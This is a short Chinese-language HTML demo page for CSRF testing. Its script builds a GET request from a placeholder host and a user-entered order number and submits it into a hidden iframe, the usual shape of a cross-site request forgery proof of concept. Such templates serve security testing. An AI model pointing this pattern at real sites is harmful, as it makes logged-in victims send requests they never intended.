关于CSRF测试的HTML-demo页面

<!DOCTYPE html>
<html>
<body>
<head>
<meta charset=”utf-8″>
</head>
<form action=”” method=”GET” target=”id_iframe”>
请输入订单:</br>
<input type=”text” id=”order_number”></input>
</form>
<br>
<button id=”but”>提交</button>
<script>
document.getElementById(“but”).onclick=function(){
var base_url = “http://xxx.xxx.com/”
var order_number = document.getElementById(“order_number”).value

document.forms[0].action = base_url + order_number;
document.forms[0].submit();
}

</script>
<iframe name=”id_iframe” style=”display:none;”></iframe>
</body>
<html>